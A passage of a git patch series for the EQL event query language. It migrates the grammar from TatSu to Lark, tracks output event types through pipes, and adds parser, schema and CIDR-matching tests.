walker = RecursiveWalker() + walker.walk(query) + + return walker.output_event_types + + def load_extensions(force=False): """Load EQL extensions.""" global _loaded_plugins diff --git a/eql/walkers.py b/eql/walkers.py index f21f873..fedd2ef 100644 --- a/eql/walkers.py +++ b/eql/walkers.py @@ -2,7 +2,6 @@ import re from collections import defaultdict, deque from contextlib import contextmanager - from .schema import Schema from .utils import is_string, to_unicode @@ -31,6 +30,7 @@ def __init__(self): self.in_pipes = [] self.base_event_types = [] self.node_stack = [] + self.output_event_types = [] def register_func(self, node_cls, func, prefix="_walk_"): """Register a callback function.""" @@ -81,12 +81,15 @@ def _enter_event_query(self, node): self.event_stack.append(node.event_type) def _enter_piped_query(self, node): # type: (PipedQuery) -> None + self.output_event_types = [] self.base_event_types = [] if isinstance(node.first, EventQuery): self.base_event_types.append(node.first.event_type) else: self.base_event_types.extend(q.query.event_type for q in node.first.queries) + self.output_event_types = self.base_event_types[:] + def _enter_pipe_command(self, node): self.in_pipes = True @@ -103,8 +106,13 @@ def _exit_piped_query(self, node): self.base_event_types = [] def _exit_pipe_command(self, node): + """Update the output schemas as they change through each pipe.""" self.in_pipes = False + incoming_schema = [Schema({event_type: {}}) for event_type in self.output_event_types] + output_schemas = node.output_schemas(node.arguments, None, incoming_schema) + self.output_event_types = [next(iter(s.schema.keys())) for s in output_schemas] + def _walk_default(self, node, *args, **kwargs): return node diff --git a/requirements.txt b/requirements.txt index 5ac1014..772ca36 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1 +1 @@ -TatSu==4.2.6 +lark-parser~=0.7 \ No newline at end of file diff --git a/setup.py b/setup.py index 487d919..ab968c9 100644 --- a/setup.py +++ b/setup.py @@ -59,7 +59,7 @@ class Test(TestCommand): def initialize_options(self): """Need to ensure pytest_args exists.""" TestCommand.initialize_options(self) - self.pytest_args = [] + self.pytest_args = ["--disable-warnings"] def run_tests(self): """Run pytest.""" diff --git a/tests/test_optimizations.py b/tests/test_optimizations.py index 67172b4..f1c157d 100644 --- a/tests/test_optimizations.py +++ b/tests/test_optimizations.py @@ -139,11 +139,19 @@ def test_static_value_optimizations(self): '2 >= 1', '2 >= 2', '2 != 1', + '(1 * 2 + 3 * 4 + 10 / 2) == (2 + 12 + 5)', + '(1 * 2 + 3 * 4 + 10 / 2) == 19', + '1 * 2 + 3 * 4 + 10 / 2 == 2 + 12 + 5', '"ABC" <= "ABC"', "length('abcdefg') == 7", "100 in (1, 2, 3, 4, 100, 105)", "'rundll' in (abc.def[100], 'RUNDLL')", "not 'rundll' in ('100', 'nothing')", + '1 - -2 == 3', + '1 - +2 == -1', + '1 +- length(a) == 1 - length(a)', + '100:concat():length() == 3', + '995 == (100 * 10):subtract("hello":length())', ] expected_false = [ @@ -155,6 +163,8 @@ def test_static_value_optimizations(self): '"ABC*DEF" == " ABC DEF "', '"abc" > "def"', '"abc" != "abc"', + # check that these aren't left to right + '1 * 2 + 3 * 4 + 10 / 2 == 15', ] for expression in expected_true: diff --git a/tests/test_parser.py b/tests/test_parser.py index 267eff9..d622e92 100644 --- a/tests/test_parser.py +++ b/tests/test_parser.py @@ -8,8 +8,10 @@ from eql.ast import * # noqa: F403 from eql.errors import EqlSyntaxError, EqlSemanticError, EqlParseError from eql.parser import ( - parse_query, parse_expression, parse_definitions, ignore_missing_functions, parse_field, parse_literal + parse_query, parse_expression, parse_definitions, ignore_missing_functions, parse_field, parse_literal, + extract_query_terms ) +from eql.walkers import DepthFirstWalker from eql.pipes import * # noqa: F403 @@ -39,6 +41,7 @@ def test_valid_expressions(self): '"string"', 'abc and def', '(1==abc) and def', + '1 * 2 + 3 * 4 + 10 / 2', 'abc == (1 and 2)', 'abc == (def and 2)', 'abc == (def and def)', @@ -90,7 +93,6 @@ def test_invalid_expressions(self): '', # empty 'a xor b', # made up comparator 'a ^ b', # made up comparator - 'a % "b"', # made up comparator 'a b c d', # missing syntax 'def[]', # no index 'def[ghi]', # index not a number @@ -156,6 +158,14 @@ def test_valid_queries(self): 'image_load where not x <= y', 'image_load where not x >= y', 'image_load where not x > y', + 'process where _leadingUnderscore == 100', + 'network where 1 * 2 + 3 * 4 + 10 / 2 == 2 + 12 + 5', + 'file where 1 - -2', + 'file where 1 + (-2)', + 'file where 1 * (-2)', + 'file where 3 * -length(file_path)', + 'network where a * b + c * d + e / f == g + h + i', + 'network where a * (b + c * d) + e / f == g + h + i', 'process where pid == 4 or pid == 5 or pid == 6 or pid == 7 or pid == 8', 'network where pid == 0 or pid == 4 or (ppid == 0 or ppid = 4) or (abc == defgh) and process_name == "*" ', 'network where pid = 4', @@ -256,7 +266,6 @@ def test_invalid_queries(self): 'file_name )', 'file_name (\r\n\r\n', 'file_name where (\r\n\r\n)', - 'process where _badSymbol == 100', 'process where 1field == 2field', 'sequence where 1field == 2field', 'process where true | filter', @@ -362,3 +371,62 @@ def test_invalid_comments(self): query_text = "process where // true" self.assertRaises(EqlParseError, parse_query, query_text) + + def test_method_syntax(self): + """Test correct parsing and rendering of methods.""" + parse1 = parse_expression("(a and b):concat():length()") + parse2 = parse_expression("a and b:concat():length()") + self.assertNotEquals(parse1, parse2) + + class Unmethodize(DepthFirstWalker): + """Strip out the method metadata, so its rendered directly as a node.""" + + def _walk_function_call(self, node): + node.as_method = False + return node + + without_method = Unmethodize().walk(parse1) + expected = parse_expression("length(concat(a and b))") + + self.assertEquals(parse1, parse_expression("(a and b):concat():length()")) + self.assertIsNot(parse1, without_method) + self.assertEquals(without_method, expected) + + def test_term_extraction(self): + """Test that EQL terms are correctly extracted.""" + process_event = """ + process where process_name == "net.exe" and child of [ + network where destination_port == 443 + ] + """ + file_event = "file where false" + network_event = " network where\n\n\n\n destination_address='1.2.3.4'\n\t and destination_port == 8443" + + sequence_template = "sequence with maxspan=10m [{}] by field1, field2, [{}] by field2, field3 [{}] by f4, f5" + join_template = "join [{}] by a [{}] by b [{}] by c until [dns where false] by d" + + # basic sequence with by + terms = [process_event, network_event, file_event] + stripped = [t.strip() for t in terms] + sequence_extracted = extract_query_terms(sequence_template.format(*terms)) + self.assertListEqual(sequence_extracted, stripped) + + # sequence with by and pipes + terms = [network_event, process_event, process_event] + stripped = [t.strip() for t in terms] + sequence_extracted = extract_query_terms(sequence_template.format(*terms) + "| head 100 | tail 10") + self.assertListEqual(sequence_extracted, stripped) + + # join with by + terms = [network_event, process_event, process_event] + stripped = [t.strip() for t in terms] + join_extracted = extract_query_terms(join_template.format(*terms)) + self.assertListEqual(join_extracted, stripped) + + # simple query without pipes + simple_extracted = extract_query_terms(network_event) + self.assertListEqual(simple_extracted, [network_event.strip()]) + + # simple query with pipes + simple_extracted = extract_query_terms(network_event + "| unique process_name, user_name\n\n| tail 10") + self.assertListEqual(simple_extracted, [network_event.strip()]) diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index c59ba53..2b64540 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py @@ -6,7 +6,6 @@ from eql import * # noqa: F403 from eql.ast import * # noqa: F403 from eql.parser import ignore_missing_functions -from eql.functions import Wildcard, Match from eql.schema import EVENT_TYPE_GENERIC from eql.tests.base import TestEngine @@ -122,7 +121,7 @@ def test_raises_errors(self): # ('process where length(0)', TypeError), # ('file where file_name.abc', AttributeError), # ('file where pid.something', AttributeError), - ('registry where invalidFunction(pid, ppid)', KeyError), + ('registry where invalidFunction(pid, ppid)', EqlCompileError), ] # Make sure that these all work as expected queries @@ -496,29 +495,6 @@ def test_relationship_pid_collision(self): event_ids = [event.data['unique_pid'] for event in output] self.validate_results(event_ids, ['host1-1003'], "Relationships failed due to pid collision") - def test_mutli_line_functions(self): - """Test wildcard and match functions.""" - sources = [ - "this is a single line comment", - """This is - a multiline - comment""", - "this\nis\nalso\na\nmultiline\ncomment" - ] - - for source in sources: - self.assertTrue(Match.run(source, ".*comment")) - # \n newlines must match on \n \s etc. but won't match on " " - self.assertTrue(Match.run(source, ".*this\sis\s.*comment")) - self.assertTrue(Match.run(source, "t.+a.+c.+")) - self.assertFalse(Match.run(source, "MiSsInG")) - - for source in sources: - self.assertTrue(Wildcard.run(source, "*comment")) - self.assertTrue(Wildcard.run(source, "this*is*comment")) - self.assertTrue(Wildcard.run(source, "t*a*c*")) - self.assertFalse(Wildcard.run(source, "MiSsInG")) - def test_pipes_reset_state(self): """Test that the pipes are clearing their state after receiving PIPE_EOF""" events = self.get_events() @@ -526,7 +502,6 @@ def test_pipes_reset_state(self): queries = [ 'process where true | unique opcode', 'process where true | unique_count opcode', - 'process where true | unique_count', 'process where true | count', 'process where true | count opcode', 'process where true | head 1', diff --git a/tests/test_schema.py b/tests/test_schema.py index 2ec6ac6..4fa8f19 100644 --- a/tests/test_schema.py +++ b/tests/test_schema.py @@ -159,7 +159,7 @@ def test_array_function_failures(self): for query in valid: self.assertRaises(EqlTypeMismatchError, parse_query, query) - def test_strict_schema(self): + def test_strict_schema_failures(self): """Check that fields can't be compared to null under strict schemas.""" queries = [ "process where command_line != null", @@ -174,6 +174,18 @@ def test_strict_schema(self): for query in queries: self.assertRaises(EqlTypeMismatchError, parse_query, query) + def test_strict_schema_success(self): + """Check that fields can't be compared to null under strict schemas.""" + queries = [ + "process where command_line != 'abc.exe'", + "process where elevated != true", + "process where not elevated", + ] + + with strict_field_schema, Schema(self.schema): + for query in queries: + parse_query(query) + def test_count_schemas(self): """Test that schemas are updated with counts in pipes.""" queries = [ diff --git a/tests/test_utils.py b/tests/test_utils.py index 556dcc7..bb096c9 100644 --- a/tests/test_utils.py +++ b/tests/test_utils.py @@ -4,8 +4,8 @@ import unittest import eql.utils -from eql.parser import parse_query, parse_expression, EqlParseError -from eql.utils import is_stateful, match_kv +from eql.parser import parse_query, parse_expression, parse_analytic, EqlParseError +from eql.utils import is_stateful, match_kv, get_output_types class TestUtils(unittest.TestCase): @@ -142,3 +142,65 @@ def test_match_kv_errors(self): self.assertRaises(TypeError, match_kv, []) self.assertRaises(TypeError, match_kv, True) self.assertRaises(TypeError, match_kv, 1) + + def test_output_types(self): + """Test that output types are correctly returned from eql.utils.get_output_types.""" + query_ast = parse_query("process where true") + self.assertEquals(get_output_types(query_ast), ["process"]) + + query_ast = parse_analytic({"query": "process where descendant of [file where true]"}) + self.assertEquals(get_output_types(query_ast), ["process"]) + + query_ast = parse_query("file where true | unique pid | head 1") + self.assertEquals(get_output_types(query_ast), ["file"]) + + query_ast = parse_query("file where true | unique_count file_path") + self.assertEquals(get_output_types(query_ast), ["file"]) + + query_ast = parse_query("any where true | unique_count file_path") + self.assertEquals(get_output_types(query_ast), ["any"]) + + query_ast = parse_query("file where true | count") + self.assertEquals(get_output_types(query_ast), ["generic"]) + + query_ast = parse_query("file where true | count process_name") + self.assertEquals(get_output_types(query_ast), ["generic"]) + + query_ast = parse_query(""" + sequence + [registry where true] + [file where true] + [process where true] + [process where true] + [process where true] + [network where true] + """) + self.assertEquals(get_output_types(query_ast), ["registry", "file", "process", "process", "process", "network"]) + + query_ast = parse_query(""" + sequence + [registry where true] + [file where true] + [process where true] + [process where true] + [process where true] + [network where true] + | count event_type + | head 5 + """) + self.assertEquals(get_output_types(query_ast), ["generic"]) + + query_ast = parse_query(""" + sequence + [registry where true] + [file where true] + [process where true] + [process where true] + [process where true] + [network where true] + | unique events[2].event_type + | sort events[1].file_size + | head 5 + | filter events[4].process_name == 'test.exe' + """) + self.assertEquals(get_output_types(query_ast), ["registry", "file", "process", "process", "process", "network"]) From 7682f9de32cb3f04b4b2b7fea5375167e1fa93e4 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 4 Feb 2020 14:20:19 +0000 Subject: [PATCH 12/13]  Conflicts:  eql/etc/eql.ebnf  eql/etc/test_queries.toml  eql/pipes.py  tests/test_python_engine.py --- .coveragerc | 19 +++ eql/etc/eql.ebnf | 262 ---------------------------------------- eql/etc/eql.g | 110 +++++++++++++++++ tests/test_functions.py | 180 +++++++++++++++++++++++++++ 4 files changed, 309 insertions(+), 262 deletions(-) create mode 100644 .coveragerc delete mode 100644 eql/etc/eql.ebnf create mode 100644 eql/etc/eql.g create mode 100644 tests/test_functions.py diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000..ed1b99d --- /dev/null +++ b/.coveragerc @@ -0,0 +1,19 @@ +# .coveragerc to control coverage.py +[run] +branch = True + +[report] +exclude_lines = + pragma: no cover + + raise NotImplementedError + raise EqlCompileError + + +omit = + eql/__main__.py + eql/highlighters.py + eql/shell.py + eql/table.py + eql/_parsergen.py + eql/tests/* diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf deleted file mode 100644 index c3186d1..0000000 --- a/eql/etc/eql.ebnf +++ /dev/null @@ -1,262 +0,0 @@ -@@grammar::EQL -@@left_recursion :: False -@@comments :: /\/\*(?:.|\n)*?\*\// -@@eol_comments :: /\/\/(?:.|\n)*?$/ -@@keyword :: and by const in join macro not of or sequence until where with -start = single_query; - - -cli_query = @:piped_query [';'] $; - - -piped_query::PipedQuery - = - | query:base_query pipes:[pipe_chain] - | query:() pipes:pipe_chain - ; - - -pipe_chain = {'|' ~ @+:pipe_command}+; - -pipe_command::Pipe - = - name:ident args:pipe_arguments - ; - - -pipe_arguments - = - | &(atom atom) {atom} - | expressions - | {} - ; - -base_query - = - | sequence - | join - | event_query - ; - -join::Join - = 'join' ~ shared_by:by_values queries+:subquery_by {queries:subquery_by}+ [until:until_clause]; - -sequence::Sequence - = - 'sequence' ~ - (shared_by:by_values ['with' params:named_params]|['with' params:named_params] shared_by:by_values) - queries:subquery_by - {queries:subquery_by}+ - [until:until_clause] - ; - -until_clause - = 'until' ~ @:subquery_by; - -subquery_by::SubqueryBy - = query:subquery params:[named_params] join_values:[by_values]; - - -subquery = '[' ~ @:event_query ']'; - -by_values - = - | 'by' ~ @:expressions - | {} - ; - - -event_query::EventQuery - = - [event_type:ident 'where' ~ ] cond:root_expression - ; - - -macro::Macro - = - 'macro' ~ name:ident '(' params:params')' body:root_expression - ; - -const::Constant - = - 'const' ~ name:ident equals value:literal - ; - - -# At some point will add CONST or other types of definitions -definition - = - | macro - | const - ; - - -# Start rules -definitions = {definition} $; -single_definition = definition $; -single_query = piped_query $; -single_expression = root_expression $; -single_atom = atom $; - - -root_expression::RootExpression - = expr:expression - ; - -expression - = - | or_expr - | subexpression - ; - -# Add check for missing parenthesis -check_paren::CheckParentheses - = - '(' ~ expr:expression ')' - ; - -or_expr::OrTerms - = terms+:subexpression {'or' ~ terms+:subexpression}+; - -subexpression - = - | and_expr - | term - ; - -and_expr::AndTerms - = terms+:term {'and' ~ terms+:term}+; - -term - = - | not_term - | sub_term - ; - -not_term::NotTerm - = 'not' ~ t:term; - - -sub_term - = - | comparison - | in_set - | value - ; - - -comparison::Comparison - = left:value op:comparator ~ right:value; - -in_set::InSet - = - expr:value 'in' ~ '(' container:expressions ')' - ; - -# Operators -equals::Equals = '==' | '='; -comparator::Comparator = comp:('<=' | '<' | equals | '!=' | '>=' | '>'); - - -value - = - | function_call - | named_subquery - | check_paren - | atom - ; - -function_call::FunctionCall - = - name:ident '(' ~ args:[expressions] ')' - ; - - -atom - = - | time_unit - | literal - | field - ; - - -expressions - = - @+:argument {',' @+:argument} [','] - ; - -argument - = expression; - -subquery_type::SubqueryType - = name:ident 'of' ~; - -named_subquery::NamedQuery - = stype:subquery_type query:subquery; - - -field::Field - = - base:ident sub_fields:{attribute | array_index} - ; - -attribute::Attribute - = '.' attr:ident - ; - - -array_index::ArrayIndex - = - '[' value:unsigned_integer ']' - ; - - -named_params::NamedParams - = - params:{named_param} - ; - -named_param::NamedParam - = - k:ident [equals v:(time_unit | atom)] - ; - -params - = - @+:ident {',' @+:ident} | {} - ; - - -# Fields -@name -ident = /[a-zA-Z][a-zA-Z0-9_]*/; - -# Literals -literal::Literal = value:( decimal | integer | string | raw_string); - -time_unit::TimeRange = val:(decimal|integer) unit:ident; # validated in python - -unsigned_integer::int - = /[0-9]+/ - ; - - -integer::int - = /[-+]?[0-9]+/ - ; - -decimal::float - = /[-+]?(?:\d+\.\d*|\d*\.\d+)(?:[Ee][-+]?\d+)?/ - ; - -string - = - | '\"' ~ @:/(\\[btnfr"'\\]|[^\r\n"\\])*/ '\"' - | "\'" ~ @:/(\\[btnfr"'\\]|[^\r\n'\\])*/ "\'" - ; - -raw_string - = - | '?\"' ~ @:/(\\"|[^"])*/ '\"' - | "?\'" ~ @:/(\\'|[^'])*/ "\'" - ; diff --git a/eql/etc/eql.g b/eql/etc/eql.g new file mode 100644 index 0000000..af62bba --- /dev/null +++ b/eql/etc/eql.g @@ -0,0 +1,110 @@ +definitions: definition* +?definition: macro | constant + +macro: "macro" name "(" [name ("," name)*] ")" expr +constant: "const" name EQUALS literal + +query_with_definitions: definitions piped_query +piped_query: base_query [pipes] + | pipes +base_query: sequence + | join + | event_query +event_query: [name "where"] expr +sequence: "sequence" [join_values with_params? | with_params join_values?] subquery_by subquery_by+ [until_subquery_by] +join: "join" join_values? subquery_by subquery_by+ until_subquery_by? +until_subquery_by.2: "until" subquery_by +pipes: pipe+ +pipe: "|" name [single_atom single_atom+ | expressions] + +join_values.2: "by" expressions +?with_params.2: "with" named_params +kv: name [EQUALS (time_range | atom)] +time_range: number name +named_params: kv ("," kv)* +subquery_by: subquery named_params? join_values? +subquery: "[" event_query "]" + + +// Expressions +expressions: expr ("," expr)* [","] +?expr: or_expr +?or_expr: and_expr ("or" and_expr)* +?and_expr: not_expr ("and" not_expr)* +?not_expr.3: NOT_OP* term +?term: sum_expr comp_op sum_expr -> comparison + | sum_expr "not" "in" "(" expressions [","]? ")" -> not_in_set + | sum_expr "in" "(" expressions [","]? ")" -> in_set + | sum_expr + +// Need to recover these tokens +EQUALS: "==" | "=" +COMP_OP: "<=" | "<" | "!=" | ">=" | ">" +?comp_op: EQUALS | COMP_OP +MULT_OP: "*" | "/" | "%" +NOT_OP: "not" + +method: ":" name "(" [expressions] ")" + + +?sum_expr: mul_expr (SIGN mul_expr)* +?mul_expr: named_subquery_test (MULT_OP named_subquery_test)* +?named_subquery_test: named_subquery + | method_chain +named_subquery.2: name "of" subquery +?method_chain: value (":" function_call)* +?value: SIGN? function_call + | SIGN? atom +function_call.2: name "(" [expressions] ")" +?atom: single_atom + | "(" expr ")" +?signed_single_atom: SIGN? single_atom +?single_atom: literal + | field + | base_field +base_field: name +field: FIELD +literal: number + | string +number: UNSIGNED_INTEGER + | DECIMAL +string: DQ_STRING + | SQ_STRING + | RAW_DQ_STRING + | RAW_SQ_STRING + +// Check against keyword usage +name: NAME + +// Tokens +// make this a token to avoid ambiguity, and make more rigid on whitespace +// sequence by pid [1] [true] looks identical to: +// sequence by pid[1] [true] +FIELD: NAME ("." WHITESPACE* NAME | "[" WHITESPACE* UNSIGNED_INTEGER WHITESPACE* "]")+ +LCASE_LETTER: "a".."z" +UCASE_LETTER: "A".."Z" +DIGIT: "0".."9" + +LETTER: UCASE_LETTER | LCASE_LETTER +WORD: LETTER+ + +NAME: ("_"|LETTER) ("_"|LETTER|DIGIT)* +UNSIGNED_INTEGER: /[0-9]+/ +EXPONENT: /[Ee][-+]?\d+/ +DECIMAL: UNSIGNED_INTEGER? "." UNSIGNED_INTEGER+ EXPONENT? + | UNSIGNED_INTEGER EXPONENT +SIGN: "+" | "-" +DQ_STRING: /"(\\[btnfr"'\\]|[^\r\n"\\])*"/ +SQ_STRING: /'(\\[btnfr"'\\]|[^\r\n'\\])*'/ +RAW_DQ_STRING: /\?"(\\\"|[^"\r\n])*"/ +RAW_SQ_STRING: /\?'(\\\'|[^'\r\n])*'/ + +%import common.NEWLINE + +COMMENT: "//" /[^\n]*/ +ML_COMMENT: "/*" /(.|\n|\r)*?/ "*/" +WHITESPACE: (" " | "\r" | "\n" | "\t" )+ + +%ignore COMMENT +%ignore ML_COMMENT +%ignore WHITESPACE diff --git a/tests/test_functions.py b/tests/test_functions.py new file mode 100644 index 0000000..b3a3676 --- /dev/null +++ b/tests/test_functions.py @@ -0,0 +1,180 @@ +"""Test Python Engine for EQL.""" +import random +import re +import unittest + +from eql.ast import String, Field +from eql.functions import Wildcard, Match, CidrMatch +from eql import types + + +class TestFunctions(unittest.TestCase): + """Direct tests for EQL functions.""" + + def test_mutli_line_functions(self): + """Test wildcard and match functions.""" + sources = [ + "this is a single line comment", + """This is + a multiline + comment""", + "this\nis\nalso\na\nmultiline\ncomment" + ] + + for source in sources: + self.assertTrue(Match.run(source, ".*comment")) + # \n newlines must match on \n \s etc. but won't match on " " + self.assertTrue(Match.run(source, ".*this\sis\s.*comment")) + self.assertTrue(Match.run(source, "t.+a.+c.+")) + self.assertFalse(Match.run(source, "MiSsInG")) + + for source in sources: + self.assertTrue(Wildcard.run(source, "*comment")) + self.assertTrue(Wildcard.run(source, "this*is*comment")) + self.assertTrue(Wildcard.run(source, "t*a*c*")) + self.assertFalse(Wildcard.run(source, "MiSsInG")) + + def test_cidr_match_validation(self): + """Check that invalid CIDR addresses are detected.""" + hints = [ + types.dynamic(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + ] + arguments = [ + Field("ip"), + String("10.0.0.0/8"), + String("b"), + String("192.168.1.0/24"), + ] + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertEquals(position, 2) + + # test that missing / causes failure + arguments[2].value = "55.55.55.0" + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertEquals(position, 2) + + # test for invalid ip + arguments[2].value = "55.55.256.0/24" + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertEquals(position, 2) + + arguments[2].value = "55.55.55.0/24" + position, _, _ = CidrMatch.validate(arguments, hints) + self.assertIsNone(position) + + def test_cidr_match_rewrite(self): + """Test that cidrMatch() rewrites the arguments.""" + arguments = [ + Field("ip"), + String("10.0.0.0/8"), + String("172.169.18.19/31"), + String("192.168.1.25/24"), + ] + hints = [ + types.dynamic(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + types.literal(types.STRING), + ] + + position, new_arguments, type_hints = CidrMatch.validate(arguments, hints) + self.assertEquals(position, None) + + # check that the original wasn't modified + self.assertIsNot(arguments[2], new_arguments[2]) + + # and that the values were set to the base of the subnet + self.assertEquals(new_arguments[2].value, "172.169.18.18/31") + self.assertEquals(new_arguments[3].value, "192.168.1.0/24") + + # test that /0 is working + arguments[2] = String("1.2.3.4/0") + position, new_arguments, type_hints = CidrMatch.validate(arguments, hints) + + self.assertIsNot(arguments[2], new_arguments[2]) + + # and /32 + self.assertEquals(new_arguments[2].value, "0.0.0.0/0") + arguments[2] = String("12.34.45.56/32") + position, new_arguments, type_hints = CidrMatch.validate(arguments, hints) + + self.assertIsNone(position) + + def test_cidr_ranges(self): + """Check that CIDR ranges are correctly identified.""" + cidr_range = CidrMatch.to_range("10.0.0.0/8") + self.assertListEqual(list(cidr_range), [ + (10, 0, 0, 0), (10, 255, 255, 255) + ]) + cidr_range = CidrMatch.to_range("123.45.67.189/32") + self.assertListEqual(list(cidr_range), [ + (123, 45, 67, 189), (123, 45, 67, 189) + ]) + + cidr_range = CidrMatch.to_range("0.0.0.0/0") + self.assertListEqual(list(cidr_range), [ + (0, 0, 0, 0), (255, 255, 255, 255) + ]) + + cidr_range = CidrMatch.to_range("192.168.15.2/22") + self.assertListEqual(list(cidr_range), [ + (192, 168, 12, 0), (192, 168, 15, 255) + ]) + + def test_octet_regex(self): + """Test that octet regex are correctly matching the range.""" + for _ in range(100): + # too many possible combos, so we can just randomly generate them + start = random.randrange(256) + end = random.randrange(256) + + # order them correctly + start, end = min(start, end), max(start, end) + + # now build the regex and check that each one matches + regex = re.compile("^(" + CidrMatch.make_octet_re(start, end) + ")$") + for num in range(500): + should_match = start <= num <= end + did_match = regex.match(str(num)) is not None + self.assertEquals(should_match, did_match) + + def test_cidr_regex(self): + """Test that octet regex are correctly matching the range.""" + for _ in range(200): + # make an ip address + ip_addr = ( + random.randrange(256), + random.randrange(256), + random.randrange(256), + random.randrange(256), + ) + size = random.randrange(33) + total_ips = 2 ** (32 - size) + + args = list(ip_addr) + args.append(size) + cidr_mask = "{:d}.{:d}.{:d}.{:d}/{:d}".format(*args) + + pattern = CidrMatch.make_cidr_regex(cidr_mask) + + regex = re.compile("^({})$".format(pattern)) + min_ip, max_ip = CidrMatch.to_range(cidr_mask) + + # randomly pick IPs that *are* in the range + for _ in range(min(200, total_ips)): + rand_addr = [random.randrange(mn, mx + 1) for mn, mx in zip(min_ip, max_ip)] + rand_ip = "{:d}.{:d}.{:d}.{:d}".format(*rand_addr) + + self.assertIsNotNone(regex.match(rand_ip)) + + # todo: pick IPs that are definitely not in the range + for _ in range(200): + rand_addr = [random.randrange(0, 255) for _ in range(4)] + in_subnet = all(mn <= o <= mx for o, mn, mx in zip(rand_addr, min_ip, max_ip)) + rand_ip = "{:d}.{:d}.{:d}.{:d}".format(*rand_addr) + + rv = regex.match(rand_ip) is not None + self.assertEquals(rv, in_subnet) From a1b5f53c463cbc5e93dcc73d56af8af530dbf2d6 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Tue, 4 Feb 2020 14:21:32 +0000 Subject: [PATCH 13/13] Updated grammar to support time_unit arg in pipe. --- eql/etc/eql.g | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/eql/etc/eql.g b/eql/etc/eql.g index af62bba..a868088 100644 --- a/eql/etc/eql.g +++ b/eql/etc/eql.g @@ -15,7 +15,7 @@ sequence: "sequence" [join_values with_params? | with_params join_values?] subqu join: "join" join_values? subquery_by subquery_by+ until_subquery_by? until_subquery_by.2: "until" subquery_by pipes: pipe+ -pipe: "|" name [single_atom single_atom+ | expressions] +pipe: "|" name [single_atom single_atom+ | time_range | expressions] join_values.2: "by" expressions ?with_params.2: "with" named_params